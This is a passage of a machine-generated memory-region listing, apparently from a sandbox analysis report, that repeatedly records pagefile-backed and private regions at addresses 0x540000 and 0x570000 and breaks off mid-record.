region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4838 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4839 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4840 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4841 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4842 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4843 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4844 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4845 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4846 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4847 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4848 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4849 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4850 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4851 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4852 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4853 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4854 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4857 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4858 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4859 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4860 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4861 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4862 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4863 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4864 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4865 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4866 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4867 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4868 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4869 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4870 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4871 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4872 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4873 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4878 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4879 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4880 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4881 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4882 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4883 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4884 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4885 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4886 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4887 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4888 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4889 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4890 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4891 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4892 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4893 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4894 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4895 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4896 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4902 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4903 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4904 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4905 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4906 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4907 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4908 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4909 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4910 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4911 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4912 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4913 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4915 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4916 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 4917 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4918 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4923 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4924 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4925 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4926 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4927 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4928 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4929 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4930 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4931 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4932 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4933 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4934 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4935 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4936 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4937 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4938 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4939 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4940 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4941 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4942 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4949 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4950 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4951 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4952 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4953 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4954 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4955 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4956 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4957 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4958 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4959 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4960 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4961 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4962 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4963 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4964 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4965 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4966 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4967 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4968 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4969 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4972 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4973 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4974 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4975 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4976 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4977 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4978 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4979 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4980 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4981 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4982 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4983 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4984 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4985 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4986 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4987 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4988 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4989 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4990 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4991 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4992 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4993 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4994 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4995 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4996 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4997 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4998 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 4999 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5000 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5001 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5002 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5003 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5004 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5005 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5006 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5007 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5008 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5009 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5010 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5011 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5012 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5013 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5014 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5015 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5016 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5017 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5018 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5019 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5020 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5021 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5022 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5023 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5024 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5025 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5026 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5028 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5029 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5030 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5031 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5032 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5033 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5034 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5035 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5036 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5037 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5038 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5039 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5040 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5041 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5042 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5043 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5044 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5047 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5050 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5051 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5052 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5053 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5054 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 